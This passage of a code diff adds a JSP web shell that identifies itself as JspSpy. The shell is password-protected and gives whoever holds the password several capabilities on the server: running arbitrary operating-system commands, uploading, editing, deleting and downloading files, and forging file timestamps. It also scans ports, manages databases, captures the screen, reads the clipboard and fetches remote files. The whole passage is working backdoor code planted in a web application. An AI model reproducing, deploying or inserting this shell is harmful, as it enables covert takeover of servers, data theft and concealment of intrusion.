))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout ??? : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void 